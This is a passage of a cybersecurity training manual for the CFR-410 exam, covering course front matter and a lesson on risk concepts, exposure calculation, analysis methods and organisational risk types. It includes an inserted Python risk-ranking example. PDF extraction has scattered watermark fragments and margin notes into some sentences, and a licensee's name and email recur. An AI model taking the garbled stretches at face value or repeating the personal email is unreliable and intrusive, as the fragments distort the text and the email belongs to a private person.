CyberSec First Responder® (Exam CFR-410)

Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com


CyberSec First Responder® (Exam CFR-410)

Part Number: CNX0013
Course Edition: 1.0

Acknowledgements

PROJECT TEAM

Author: Jason Nufryk, CFR
Contributing Author: Belton Myers, CFR
Media Designer: Brian J. Sullivan
Content Editor: Geoff Graser

CertNexus wishes to thank Stacey McBrine, Al Wills, and members of the Logical Operations Instructor Community for their instructional and technical expertise during the creation of this course.

Notices

DISCLAIMER

While CertNexus, Inc. takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or fitness for a particular purpose. The name used in the data files for this course is that of a fictitious company. Any resemblance to current or future companies is purely coincidental. We do not believe we have used anyone's name in creating this course, but if we have, please notify us and we will change the name in the next revision of the course. CertNexus is an independent provider of integrated training solutions for individuals, businesses, educational institutions, and government agencies. The use of screenshots, photographs of another entity's products, or another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply sponsorship or endorsement of the book by nor any affiliation of such entity with CertNexus. This courseware may contain links to sites on the Internet that are owned and operated by third parties (the "External Sites"). CertNexus is not responsible for the availability of, or the content located on or through, any External Site. Please contact CertNexus if you have any concerns regarding such links or External Sites.

TRADEMARK NOTICES

CertNexus and the CertNexus logo are trademarks of CertNexus, Inc. and its affiliates. Microsoft® Windows® is a registered trademark of Microsoft Corporation in the United States and other countries. Kali Linux™ is a trademark of Offensive Security in the United States and other countries. All other product and service names used may be common law or registered trademarks of their respective proprietors.

Copyright © 2021 CertNexus, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software proprietor. This publication, or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, storage in an information retrieval system, or otherwise, without express written permission of CertNexus, 3535 Winton Place, Rochester, NY 14623, 1-800-326-8724 in the United States and Canada, 1-585-350-7000 in all other countries. CertNexus' World Wide Web site is located at www.certnexus.com.

This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or other products is the responsibility of the user according to terms and conditions of the owner. Do not make illegal copies of books or software. If you believe that this book, related materials, or any other CertNexus materials are being reproduced or transmitted without permission, please call 1-800-326-8724 in the United States and Canada, 1-585-350-7000 in all other countries.


CyberSec First Responder® (Exam CFR-410)

Table of Contents

Lesson 1: Assessing Cybersecurity Risk .......................... 1
  Topic A: Identify the Importance of Risk Management .......... 2
  Topic B: Assess Risk .......................................... 10
  Topic C: Mitigate Risk ........................................ 23
  Topic D: Integrate Documentation into Risk Management ........ 37

Lesson 2: Analyzing the Threat Landscape ........................ 53
  Topic A: Classify Threats ..................................... 54
  Topic B: Analyze Trends Affecting Security Posture ............ 66

Lesson 3: Analyzing Reconnaissance Threats to Computing and Network Environments ... 77
  Topic A: Implement Threat Modeling ............................ 78
  Topic B: Assess the Impact of Reconnaissance .................. 86
  Topic C: Assess the Impact of Social Engineering .............. 108

Lesson 4: Analyzing Attacks on Computing and Network Environments ... 121
  Topic A: Assess the Impact of System Hacking Attacks .......... 122
  Topic B: Assess the Impact of Web-Based Attacks ............... 131
  Topic C: Assess the Impact of Malware ......................... 143
  Topic D: Assess the Impact of Hijacking and Impersonation Attacks ... 152
  Topic E: Assess the Impact of DoS Incidents ................... 161
  Topic F: Assess the Impact of Threats to Mobile Security ...... 168
  Topic G: Assess the Impact of Threats to Cloud Security ....... 173

Lesson 5: Analyzing Post-Attack Techniques ...................... 179
  Topic A: Assess Command and Control Techniques ................ 180
  Topic B: Assess Persistence Techniques ........................ 187
  Topic C: Assess Lateral Movement and Pivoting Techniques ...... 191
  Topic D: Assess Data Exfiltration Techniques .................. 202
  Topic E: Assess Anti-Forensics Techniques ..................... 209

Lesson 6: Assessing the Organization's Security Posture ......... 217
  Topic A: Implement Cybersecurity Auditing ..................... 218
  Topic B: Implement a Vulnerability Management Plan ............ 230
  Topic C: Assess Vulnerabilities ............................... 238
  Topic D: Conduct Penetration Testing .......................... 253

Lesson 7: Collecting Cybersecurity Intelligence ................. 271
  Topic A: Deploy a Security Intelligence Collection and Analysis Platform ... 272
  Topic B: Collect Data from Network-Based Intelligence Sources ... 286
  Topic C: Collect Data from Host-Based Intelligence Sources .... 302

Lesson 8: Analyzing Log Data .................................... 315
  Topic A: Use Common Tools to Analyze Logs ..................... 316
  Topic B: Use SIEM Tools for Analysis .......................... 332

Lesson 9: Performing Active Asset and Network Analysis .......... 343
  Topic A: Analyze Incidents with Windows-Based Tools ........... 344
  Topic B: Analyze Incidents with Linux-Based Tools ............. 362
  Topic C: Analyze Indicators of Compromise ..................... 372

Lesson 10: Responding to Cybersecurity Incidents ................ 391
  Topic A: Deploy an Incident Handling and Response Architecture ... 392
  Topic B: Mitigate Incidents ................................... 407
  Topic C: Hand Over Incident Information to a Forensic Investigation ... 425

Lesson 11: Investigating Cybersecurity Incidents ................ 429
  Topic A: Apply a Forensic Investigation Plan .................. 430
  Topic B: Securely Collect and Analyze Electronic Evidence ..... 443
  Topic C: Follow Up on the Results of an Investigation ......... 460

Appendix A: Mapping Course Content to CyberSec First Responder® (Exam CFR-410) ... 469

Appendix B: Regular Expressions ................................. 471
  Topic A: Parse Log Files with Regular Expressions ............. 472

Solutions ....................................................... 481

Glossary ........................................................ 509

Index ........................................................... 529


About This Course

This course covers network defense and incident response methods, tactics, and procedures that are in alignment with industry frameworks such as NIST SP 800-61r2 (Computer Security Incident Handling Guide), US-CERT's National Cyber Incident Response Plan (NCIRP), and Presidential Policy Directive (PPD)-41 on Cyber Incident Coordination. It is ideal for candidates who have been tasked with the responsibility of monitoring and detecting security incidents in information systems and networks, and for executing standardized responses to such incidents. The course introduces tools, tactics, and procedures to manage cybersecurity risks, defend cybersecurity assets, identify various types of common threats, evaluate the organization's security, collect and analyze cybersecurity intelligence, and remediate and report incidents as they occur. This course provides a comprehensive methodology for individuals responsible for defending the cybersecurity of their organization.

This course is designed to assist students in preparing for the CertNexus CyberSec First Responder (Exam CFR-410) certification examination. What you learn and practice in this course can be a significant part of your preparation.

In addition, this course and subsequent certification (CFR-410) meet all requirements for personnel requiring DoD directive 8570.01-M and directive 8140 position certification baselines:
• CSSP Analyst
• CSSP Infrastructure Support
• CSSP Incident Responder
• CSSP Auditor

The course and certification also meet all criteria for the following Cybersecurity Maturity Model Certification (CMMC) domains:
• Incident Response (IR)
• Audit and Accountability (AU)
• Risk Management (RM)

Course Description

Target Student
This course is designed primarily for cybersecurity practitioners preparing for or who currently perform job functions related to protecting information systems by ensuring their availability, integrity, authentication, confidentiality, and non-repudiation. It is ideal for those roles within federal contracting companies and private sector firms whose mission or strategic objectives require the execution of Defensive Cyber Operations (DCO) or DoD Information Network (DoDIN) operation and incident handling. This course focuses on the knowledge, ability, and skills necessary to provide for the defense of those information systems in a cybersecurity context, including protection, detection, analysis, investigation, and response processes.

In addition, the course ensures that all members of an IT team, regardless of size, rank, or budget, understand their role in the cyber defense, incident response, and incident handling process.

Course Prerequisites
To ensure your success in this course, you should meet the following requirements:
• At least two years (recommended) of experience or education in computer network security technology or a related field.
• The ability or curiosity to recognize information security vulnerabilities and threats in the context of risk management.
• Foundational knowledge of the concepts and operational framework of common assurance safeguards in network environments. Safeguards include, but are not limited to, firewalls, intrusion prevention systems, and VPNs.
• General knowledge of the concepts and operational framework of common assurance safeguards in computing environments. Safeguards include, but are not limited to, basic authentication and authorization, resource permissions, and anti-malware mechanisms.
• Foundation-level skills with some of the common operating systems for computing environments.
• Entry-level understanding of some of the common concepts for network environments, such as routing and switching.
• General or practical knowledge of major TCP/IP networking protocols, including, but not limited to, TCP, IP, UDP, DNS, HTTP, ARP, ICMP, and DHCP.
Course Objectives
In this course, you will identify, assess, respond to, and protect against security threats and operate a system and network security analysis platform.

You will:
• Assess cybersecurity risks to the organization.
• Analyze the threat landscape.
• Analyze various reconnaissance threats to computing and network environments.
• Analyze various attacks on computing and network environments.
• Analyze various post-attack techniques.
• Assess the organization's security posture through auditing, vulnerability management, and penetration testing.
• Collect cybersecurity intelligence from various network-based and host-based sources.
• Analyze log data to reveal evidence of threats and incidents.
• Perform active asset and network analysis to detect incidents.
• Respond to cybersecurity incidents using containment, mitigation, and recovery tactics.
• Investigate cybersecurity incidents using forensic analysis techniques.

The CHOICE Home Screen
Login and access information for your CHOICE environment will be provided with your class experience. The CHOICE platform is your entry point to the CHOICE learning experience, of which this course manual is only one part.

On the CHOICE Home screen, you can access the CHOICE Course screens for your specific courses. Visit the CHOICE Course screen both during and after class to make use of the world of support and instructional resources that make up the CHOICE experience.
Each CHOICE Course screen will give you access to the following resources:
• Classroom: A link to your training provider's classroom environment.
• eBook: An interactive electronic version of the printed book for your course.
• Files: Any course files available to download.
• Checklists: Step-by-step procedures and general guidelines you can use as a reference during and after class.
• Assessment: A course assessment for your self-assessment of the course content.
• Social media resources that enable you to collaborate with others in the learning community using professional communications sites, such as LinkedIn, or microblogging tools, such as Twitter.

Depending on the nature of your course and the components chosen by your learning provider, the CHOICE Course screen may also include access to elements such as:
• LogicalLABS, a virtual technical environment for your course.
• Various partner resources related to the courseware.
• Related certifications or credentials.
• A link to your training provider's website.
• Notices from the CHOICE administrator.
• Newsletters and other communications from your learning provider.
• Mentoring services.
Visit your CHOICE Home screen often to connect, communicate, and extend your learning experience!
How to Use This Book

As You Learn
This book is divided into lessons and topics, covering a subject or a set of related subjects. In most cases, lessons are arranged in order of increasing proficiency.
The results-oriented topics include relevant and supporting information you need to master the content. Each topic has various types of activities designed to enable you to solidify your understanding of the informational material presented in the course. Information is provided for reference and reflection to facilitate understanding and practice.

Data files for various activities as well as other supporting files for the course are available by download from the CHOICE Course screen. In addition to sample data for the course exercises, the course files may contain media components to enhance your learning and additional reference materials for use both during and after the course.
Checklists of procedures and guidelines can be used during class and as after-class references when you're back on the job and need to refresh your understanding.

At the back of the book, you will find a glossary of the definitions of the terms and concepts used throughout the course. You will also find an index to assist in locating information within the instructional components of the book. In many electronic versions of the book, you can click links on key words in the content to move to the associated glossary definition, and on page references in the index to move to that term in the content. To return to the previous location in the document after clicking a link, use the appropriate functionality in your PDF viewing software.

As You Review
Any method of instruction is only as effective as the time and effort you, the student, are willing to invest in it. In addition, some of the information that you learn in class may not be important to you immediately, but it may become important later. For this reason, we encourage you to spend some time reviewing the content of the course after your time in the classroom.
As a Reference
The organization and layout of this book make it an easy-to-use resource for future reference. Taking advantage of the glossary, index, and table of contents, you can use this book as a first source of definitions, background information, and summaries.

Course Icons
Watch throughout the material for the following visual cues.

Icon: Description
Note: A Note provides additional information, guidance, or hints about a topic or task.
Caution: A Caution note makes you aware of places where you need to be particularly careful with your actions, settings, or decisions so that you can be sure to get the desired results of an activity or task.
Checklist: Checklists provide job aids you can use after class as a reference to perform skills back on the job. Access checklists from your CHOICE Course screen.
Social: Social notes remind you to check your CHOICE Course screen for opportunities to interact with the CHOICE community using social media.
Lesson 1: Assessing Cybersecurity Risk

Lesson Time: 3 hours

Lesson Introduction
As a security professional, you are familiar with the ways in which information is vulnerable to theft, destruction, alteration, and unavailability. But good security is not just a process of reacting to individual threats when they appear or closing holes when they are discovered; it is a process of understanding how your information, by its very nature and the ways in which it is used, is at risk of being compromised. When you understand the risks you face at a foundational level, you can better prepare yourself to reduce or eliminate the chances of a security incident occurring and the impact it will have on your information.

Lesson Objectives
In this lesson, you will:
• Identify the strategic value of risk management in the context of cybersecurity.
• Assess risks that affect the organization.
• Translate risk assessment into specific strategies for mitigation.
• Integrate documentation into risk management.


TOPIC A
Identify the Importance of Risk Management
In our highly connected world, technology accelerates exponentially, granting newer and faster ways for human beings to work with information. With this rapid growth, it is inevitable that threats to our information advance just the same. The significance of security in modern information systems cannot be overstated.

Cybersecurity

Figure 1-1: Elements of cybersecurity. (Two panels: Elements of Cybersecurity (Endpoint Model) and Elements of Cybersecurity (Perimeter Model).)

Note: Contrast the endpoint model (mall) image with the perimeter model (castle) image. Securing endpoint access is a more up-to-date model that addresses the challenges of remote access and telecommuting. The perimeter model is an older style that automatically distrusts anything outside the perimeter and implicitly trusts anything on the inside.

Cybersecurity refers to the protection of personal or organizational information or information resources from unauthorized access, attacks, theft, or data damage. In the context of cybersecurity, you will encounter various common terms that have special meaning.

Term: Description
Asset: Anything of value that could be compromised, stolen, or harmed, including information, physical resources, and reputation.
Threat: Any event or action that could potentially cause damage to an asset or interruption of services.
Attack: The intentional act of attempting to bypass one or more security services or controls of an information system.
Vulnerability: A condition that leaves the system and its assets open to harm, including such things as software bugs, insecure passwords, inadequate physical security, and poorly designed networks.
Exploit: A technique that takes advantage of a vulnerability to perform an attack. Exploit may also refer to a packaged form of the technique, such as an application or script that automates the technique so even an unskilled attacker can use the exploit to perform an attack.
Control: A countermeasure that you put in place to avoid, mitigate, or counteract security risks due to threats or attacks.

Lesson 1: Assessing Cybersecurity Risk | Topic A
The Risk Equation
As a cybersecurity professional, your responsibility is to identify risks and protect your systems from them. In this context, risk is a measure of your exposure to the chance of damage or loss. It signifies the likelihood that a hazard or dangerous threat will occur. Risk is often associated with the loss of a system, power, or network, and other physical losses. However, risk also affects people, practices, and processes.

Although there seem to be unlimited possibilities and variations when it comes to attacks, the time and resources you can devote to securing an asset are unfortunately limited. You must determine how to deal with various risks when you plan your asset security, which is a process called risk management. To effectively manage risk, you need to consider the factors inherent in the risks you are dealing with.

Risk is often considered to be composed of three factors, as expressed in the following formula:

Risk = Threats × Vulnerabilities × Consequences

• A threat is something or someone that can take advantage of vulnerabilities.
• A vulnerability is a weakness or deficiency that enables an attacker to violate the system's integrity.
• A consequence, also called an impact, is damage that occurs because the threat took advantage of the vulnerability. There are technical impacts as well as business impacts, and the former usually leads to the latter.

The product form is a conceptual model rather than an arithmetic one: it expresses that if any one factor is absent (no capable threat, no vulnerability for it to use, or no consequence if it succeeds), there is no risk to manage.

Note: The term "consequence" is used by the Department of Homeland Security. You may also have seen this same formula using the word "impacts" instead of "consequences."

Figure 1-2: The risk equation.

Note: The consequences shown in the figure are only an example. Some malware may produce consequences other than those listed here.

In the example in the figure, an attacker tricks an inexperienced user (the vulnerability) into installing ransomware (the threat) on their workstation, encrypting the data on the workstation as well as any mapped network shares, making the data unreadable (the technical consequence). If the organization has no backups of the data, it may be gone forever and impossible to reconstruct; if such data is mission critical, the organization may lose its competitive advantage. Stakeholders in the organization then lose confidence, and may be less likely to continue supporting the organization (the business consequence).
Risk Management
By estimating the extent of the three factors comprising risk, you can determine the extent of the risk, which will guide your decision on how to deal with it. For example, even though a particular vulnerability is easy to take advantage of and the threat of someone taking advantage of it is high, if the consequences are trivial or non-existent, then you might deem the risk to be acceptable and prevention measures to be unnecessary. On the other hand, if the vulnerability and threat are low but the consequences are quite high, you might deem the risk to be unacceptable, and choose to spend time and effort to implement safeguards.

You may not be in a position to make all the decisions regarding risk management. Such decisions may be made by business stakeholders or a project management team. However, you may be in a unique position to understand where certain technical risks exist and need to bring them to the attention of decision makers.

The reason why risk is managed rather than outright eliminated is that risk is not always in opposition to an organization's goals. In fact, if you tried to eliminate risk altogether, the organization would cease to function. You'd be completely disconnected, you wouldn't be able to use any electronic devices, and operations would grind to a halt. That's why risk management is a process of understanding what risks you can take, as long as the reward is worth the risk.

The Risk Management Process
To meet the ever-evolving needs of information security, an information assurance professional must be able to manage the risks their information is exposed to. Risk management is typically defined as the cyclical process of identifying, assessing, analyzing, and responding to risks. This process is not meant to end; as long as information exists, it will need protecting. Therefore, risk management recurs indefinitely so that you may, at all times, keep your information as secure as possible.

Without risk management, your security will be passive; and when you secure your information passively, it will be at the mercy of the quickly changing tides of technological advancement.

Note: There are several other ways to represent the cycle of risk management. Some, for example, blend assessment and analysis together.

Figure 1-3: One way to represent the cycle of risk management.
CyberSec First Responder® (Exam CFR-410) | 5

Risk Exposure
Risk exposure is the property that dictates how susceptible an organization is to loss. When Risk Exposure
quantified, risk exposure is usually defined by multiplying the probability that an incident will occur
by the expected impact or loss if it does occur. For example, if you expect the likelihood of
ransomware wiping out your critical data to be 10%, and you estimate that the loss of such data
would cost the organization $100,000, then your risk exposure is .10 × 100,000 = $10,000. Of
course, this assumes that such a risk can be neatly quantified.
An organization exposes itself to risk in every action it takes. These actions occur during the process Qualitative vs.

e
of an organization conducting business, and the constant need for assessing those risks has given quantitative risk analysis
is discussed shortly.

ut
rise to the security industry as a whole. Without risk, there would be no need for security, as there
would be no consequences to poorly executed business processes. Since businesses are highly
dependent on the latest technologies, an increasing amount of risks involve cybersecurity

ib
professionals as the primary means to manage those risks.
Through risk management, an organization can keep its risk exposure low, but it can never really
avoid it entirely. This is why it is so critical for security professionals to constantly be vigilant for the

tr
elements of risk—including threats, attacks, and vulnerabilities—that have the potential to cause
harm to the organization's assets. Ignoring your organization's exposure to risk will limit its ability to

is
survive in any industry.

Risk Analysis Methods

Cybersecurity professionals conduct risk analysis to determine how to protect devices, networks, information, and other assets to minimize damage to the organization. The style of the content and output of any risk analysis must reflect the framework and jurisdiction within which the organization is operating. For example, within the UK, risk analysis undertaken for a government or as part of government contracts must present the outputs in business language. In contrast, if risk analysis is being undertaken as part of an ISO 27000 certification, then no such constraint exists apart from the likelihood and consequences of risks being communicated and understood.

The National Institute of Standards and Technology (NIST) includes only qualitative and quantitative risk analysis methods in SP 800-30.

The risk analysis methods used to calculate exposure fall into one of three categories.

Method / Description

Qualitative: Qualitative analysis methods use descriptions and words to measure the likelihood and impact of risk. For example, impact ratings can be severe/high, moderate/medium, or low; and likelihood ratings can be likely, unlikely, or rare.

Qualitative analysis is generally scenario based. A weakness of qualitative risk analysis lies with its sometimes subjective and untestable methodology. You can also assign numbers between 0 and 9 for exposures and damage potential. However, you do not perform calculations on the numbers assigned to the risks. The goal of qualitative assessment is to rank the risks on a scale of 1 to 25, for example.

Quantitative: Quantitative analysis is based completely on numeric values. Data is analyzed using historical records, experiences, industry best practices and records, statistical theories, testing, and experiments.

This method may be weak in situations where risk is not easily quantifiable. The goal of quantitative analysis is to calculate the probable loss for every risk.
Lesson 1: Assessing Cybersecurity Risk | Topic A


6 | CyberSec First Responder® (Exam CFR-410)

Semi-quantitative: A semi-quantitative analysis method exists because it's impossible for a purely quantitative risk assessment to exist given that some issues defy numbers. For example, how much is your employee morale worth in terms of dollars? What is your corporate reputation worth?

A semi-quantitative analysis attempts to find a middle ground between the previous two risk analysis types to create a hybrid method.
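The following Python is an added example, not part of the CFR-410 course text, that puts the three methods side by side on a small constructed risk register. It shows how a qualitative ranking on the 1-to-25 scale is produced, how the quantitative probable loss is computed and why a risk with no dollar figure drops out of that ranking, and how a semi-quantitative hybrid keeps such a risk in the ranking. The five-level ordinal scales, the dollar-to-impact thresholds and the probability-times-loss formula are assumptions made for this illustration, not definitions from the course.

```python
"""Added example (not from the CFR-410 course): the three risk analysis
methods applied to one constructed risk register. The five-level ordinal
scales, the dollar thresholds and the probable-loss formula
(annual probability x loss when realized) are assumptions for this
illustration; the course text defines none of them."""
from dataclasses import dataclass
from typing import List, Optional

# Assumed ordinal scales, 1 (lowest) to 5 (highest). The course only gives
# example words (rare/unlikely/likely; low/medium/high), so the five-step
# versions used here are an assumption.
LIKELIHOOD = {"rare": 1, "unlikely": 2, "possible": 3, "likely": 4, "almost certain": 5}
IMPACT = {"negligible": 1, "low": 2, "moderate": 3, "high": 4, "severe": 5}


@dataclass
class Risk:
    name: str
    likelihood: str            # qualitative rating, a word from LIKELIHOOD
    impact: str                # qualitative rating, a word from IMPACT
    annual_probability: float  # quantitative: chance the event occurs in a year
    loss_if_realized: Optional[float]  # dollars per occurrence; None if not quantifiable


def qualitative_score(risk: Risk) -> int:
    """Qualitative method: rank on the 1-to-25 scale by combining the two ordinal
    ratings. The product is only used to order risks; no further arithmetic is
    done on it, matching the course's caveat about qualitative numbers."""
    return LIKELIHOOD[risk.likelihood] * IMPACT[risk.impact]


def probable_annual_loss(risk: Risk) -> Optional[float]:
    """Quantitative method: probable loss per year, or None when the loss cannot
    be expressed as a number (the weakness the course points out)."""
    if risk.loss_if_realized is None:
        return None
    return risk.annual_probability * risk.loss_if_realized


def impact_band_from_loss(loss: float) -> int:
    """Map a dollar loss onto the 1-to-5 impact scale (assumed thresholds)."""
    for band, ceiling in enumerate((1_000, 10_000, 100_000, 1_000_000), start=1):
        if loss < ceiling:
            return band
    return 5


def semi_quantitative_score(risk: Risk) -> int:
    """Semi-quantitative method: derive the impact band from a measured loss
    when one exists, otherwise fall back to the qualitative impact word."""
    if risk.loss_if_realized is not None:
        impact = impact_band_from_loss(risk.loss_if_realized)
    else:
        impact = IMPACT[risk.impact]
    return LIKELIHOOD[risk.likelihood] * impact


def rank_qualitatively(risks: List[Risk]) -> List[Risk]:
    return sorted(risks, key=qualitative_score, reverse=True)


def rank_quantitatively(risks: List[Risk]) -> List[Risk]:
    """Only risks with a numeric loss can be ranked; the rest drop out."""
    measurable = [r for r in risks if probable_annual_loss(r) is not None]
    return sorted(measurable, key=probable_annual_loss, reverse=True)


def rank_semi_quantitatively(risks: List[Risk]) -> List[Risk]:
    return sorted(risks, key=semi_quantitative_score, reverse=True)


# Constructed sample register; every value here is invented for the example.
REGISTER = [
    Risk("File servers unavailable at peak hours", "likely", "moderate", 0.5, 25_000.0),
    Risk("Ransomware on engineering workstations", "unlikely", "severe", 0.125, 400_000.0),
    Risk("Lost unencrypted laptop", "possible", "high", 0.25, 50_000.0),
    Risk("Staff morale damaged after a breach", "possible", "moderate", 0.25, None),
]

if __name__ == "__main__":
    for label, ranked in (("Qualitative", rank_qualitatively(REGISTER)),
                          ("Quantitative", rank_quantitatively(REGISTER)),
                          ("Semi-quantitative", rank_semi_quantitatively(REGISTER))):
        print(label)
        for r in ranked:
            loss = probable_annual_loss(r)
            loss_text = f"${loss:,.0f}/yr" if loss is not None else "not quantifiable"
            print(f"  {r.name}: score {qualitative_score(r)}/25, "
                  f"semi {semi_quantitative_score(r)}/25, {loss_text}")
```

Note how the morale risk is absent from the quantitative ranking altogether, while the semi-quantitative ranking places it alongside the measurable risks; that is the gap the hybrid method exists to close.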

The Impact of Risks on the Organization

As an information assurance professional, you're likely to face risk in many different forms. Before you can even begin to mitigate risks, you need to know where they exist within your organization and identify how they can cause harm. The following table categorizes various types of risk that you may encounter in your organization. Keep in mind that risks are not necessarily technical, but can be articulated in business terms.

Ask students if they can think of any other types of risk that may affect their organization.

Risk Type / Description and Impact

Legal: Every organization, no matter the industry, must comply with certain laws and regulations to stay within legal boundaries. For example, customer protection laws are put in place by most governments that penalize organizations that engage in activities that defraud the consumer.

Other unethical business practices, unscrupulous employees, and negligent management can all place your organization in jeopardy. If the organization is not in compliance, it may be served with a notification first, and more severe penalties could follow if the issue is not addressed in a sufficient and timely manner. The organization can not only run afoul of certain laws, but can also be subjected to litigation by certain parties who feel they deserve recompense. In addition, mounting legal fees can have a significant monetary effect on the organization.

Financial: Your organization likely has expected revenue and profit margins based on a number of calculations, and many different threats can cause your business to fail to meet monetary expectations. Financial risks may seriously affect your organization's survivability in a competitive marketplace. These risks can have a direct impact on your finances—like an immediate loss in profitability—or the effects can be more indirect, like an impact to operational expenses that can subtly decrease productivity due to lack of spending on required resources.

You should also consider how a particularly devastating and/or insidious threat may influence insurance costs, as these can often be a risk unto themselves.

Physical assets: Depending on your organization's size, you may have a great deal of valuable physical property stored in various company sites. Any physical product that your organization sells is your primary concern. Electronics such as computers, industrial machinery, and office appliances are also at risk of being stolen or otherwise damaged.

Both human threats and environmental factors may put your physical assets at risk.
Intellectual property: Organizations that create and own intellectual property, such as entertainment media, software, trade secrets, and product designs, all risk having these ideas and concepts destroyed or used in unauthorized ways. Although intellectual property is typically not stolen in the same sense as physical theft, a threat may infringe on trademarks and copyrights that you have in place.

A threat that destroys or alters your intellectual property may make it extremely difficult or even impossible to recover. Sophisticated data exfiltration techniques can also make it difficult for you to even spot a breach of your intellectual property in the first place.

Infrastructure: An organization must depend on its infrastructure to function at maximum efficiency. Whether physical or abstract, the frameworks that hold an organization together are vulnerable to a number of threats. This is particularly true of any infrastructure that supplies power or facilitates transportation.

Infrastructure risk affects the business at its foundational level.

Operations: Day-to-day operations are what keep your organization running and fulfilling not just its monetary expectations, but also its vision. Even if there are no immediate financial consequences, the organization risks losing its foothold in the marketplace, and its products or services may no longer be viable. Especially damaging are risks that impact the organization's operational capacity (i.e., its ability to execute many business processes at once).

Likewise, operational risks can have an impact on the time that personnel or other assets spend on addressing the effects of the risk—time that would have otherwise been spent running normal business processes. If certain cybersecurity processes prove to be ineffective at mitigating a risk, then improvements to these cybersecurity processes may be required, further affecting overall business operations.

Reputation: The public's perception of an organization may greatly affect its success, and in some cases, may doom it to failure. A business often must maintain great relationships with its customers and ensure that society at large views it positively.

Your organization's brand may be devalued if the public reacts negatively to scenarios such as theft of personal data, unethical business practices, and a decline in the quality of products and services. These scenarios can also negatively impact the effectiveness of public relations management programs.

Health: Whether it's your employees or the customers they work with, people are at risk of harm as a result of your operations. Although high-risk industries like law enforcement have obvious health concerns, even typical businesses can put their personnel and customers at risk by providing unsafe, untested products and services.

Physical assets like industrial machinery and electrical equipment may pose significant health risks to employees who use them.

ACTIVITY 1-1
Identifying the Importance of Risk Management

Scenario

You are a member of the cybersecurity team at Develetech Industries, a manufacturer of home electronics located in the fictitious city and state of Greene City, Richland (RL). The CEO has recently placed you in charge of maintaining your company's security in the face of a wide variety of threats that target every dimension of your operations.

Before you can dive into the diverse and complex world of cybersecurity, you need to develop your organizational security strategies following the principle of risk management. When you can identify just how risk can negatively affect your organization, you'll be able to convince your employer, team, and the rest of your employees of the importance of managing that risk.

1. Develetech, a relatively large electronics manufacturer, is looking to expand its business domestically and internationally over the next couple of years. This may include everything from taking on new staff to establishing additional offices and warehouses.
Why would these changes necessitate the re-evaluation of a risk management strategy?

A: Answers will vary, but significant changes can bring about risk in many different ways. It may become more challenging to secure sensitive information and keep it out of unauthorized hands, or it may simply require more resources to secure more at-risk areas. Managing risk to information and systems will help your organization avoid legal and financial disasters. Additionally, there will be pressure from stakeholders, customers, and regulatory entities to conform to their expectations and meet standardization requirements. There is also the chance that an increase in the amount of communications in the organization will exponentially increase the amount of risk that these communication channels take on. You need to make sure changes to your organization can uphold risk management expectations.

2. What are the specific types of risk that could affect Develetech as it expands its business?

A: Answers will vary, as there are many potential risks. Additional offices and warehouses will require an infrastructure overhaul, which will require a reevaluation of infrastructural integrity. Certain physical assets, including computers and networking equipment, may not be able to sustain an increase in operational capacity. More personnel may increase the risk of a safety incident. Failing to understand and adhere to laws and regulations, especially when moving operations into a foreign country, may create legality issues for the organization. Financially, a security breach could cost the organization a great deal, and its reputation may suffer as a result. There may also be potential issues with the supply chain, which can have operational impacts on the business.


3. You've identified a risk to the availability of your file servers at peak traffic hours.
What risk analysis method would you prefer to use to determine Develetech's risk exposure in this area, and why?

A: Answers will vary, but most organizations choose a combination of both quantitative and qualitative analysis methods with an emphasis one way or the other. When it comes to risk, there is not necessarily an objectively right answer. Quantitative analysis tends to be more precise, but it's also expensive and not always feasible; qualitative analysis tends to be faster and cheaper, but it's not always useful. Semi-quantitative analysis may be able to leverage the strengths of both while minimizing their weaknesses. In any case, you may need more information about a situation before the best approach becomes obvious.

ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

Lesson 1: Assessing Cybersecurity Risk | Topic A


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
10 | CyberSec First Responder® (Exam CFR-410)

TOPIC B
Assess Risk
Now that you've identified the importance of risk management, you can begin the management process by assessing how risk will impact your organization. For any organization, there are many different elements of normal business operations that may affect its risk profile. Being able to identify how these elements are relevant to your organization's security will prevent you from missing crucial information when the time comes to mitigate risk.

Security Standards and Frameworks

The cybersecurity industry has many different standards and frameworks that can help an organization define its cybersecurity goals and how to achieve those goals. Many of these standards and frameworks address risk specifically, or they are at least relevant to risk management indirectly. In particular, you can use these documents to help guide your risk assessment practices.

The following table briefly describes some of the most common standards and frameworks that focus on cybersecurity.

Each of the documents mentioned in this topic could fill an entire course. Ensure students understand they're being given a high-level overview of them, not an in-depth tour. Consider asking students if they understand the distinction between standards and frameworks vs. laws and regulations.

Standard or Framework / Description

NIST Cybersecurity Framework: The National Institute of Standards and Technology (NIST), a non-regulatory agency of the United States government, publishes numerous documents on a wide range of security topics. The Cybersecurity Framework, first published in 2014, is a unified framework that provides guidance to organizations for managing their risk. The most recent version as of mid-2021 is version 1.1, released in 2018.

The Cybersecurity Framework seeks to adopt a common language for best practices in the realm of cybersecurity so that any organization can apply that guidance to its own environment. It includes three major sections: "Core," which defines cybersecurity activities and their outcomes in several functional areas; "Profile," which includes outcomes specifically chosen by the organization based on its needs; and "Tiers," which demonstrate how an organization's application of risk management aligns with various characteristics defined by the Cybersecurity Framework.

NIST SP 800-61: NIST's 800 series Special Publications (SP) focus on computer security. This particular publication is titled Computer Security Incident Handling Guide. As the name implies, it provides guidance and recommendations during the incident response process. The latest version, published in 2012, is version 2.

Lesson 1: Assessing Cybersecurity Risk | Topic B



RMF: The Risk Management Framework (RMF), developed by NIST and used by the U.S. Department of Defense, includes processes for integrating information assurance and risk management strategies into the systems development lifecycle (SDLC). The RMF is outlined in two 800 series publications: SP 800-37, Risk Management Framework for Information Systems and Organizations: A System Life Cycle Approach for Security and Privacy, and SP 800-53, Security and Privacy Controls for Information Systems and Organizations.

COBIT: Control Objectives for Information and Related Technology (COBIT), created by ISACA®, provides a framework for IT management and governance. It promotes five principles: meeting stakeholder needs; covering the organization end to end; applying a single, integrated framework; enabling a holistic approach; and separating governance from management. The most recent version is COBIT 2019.

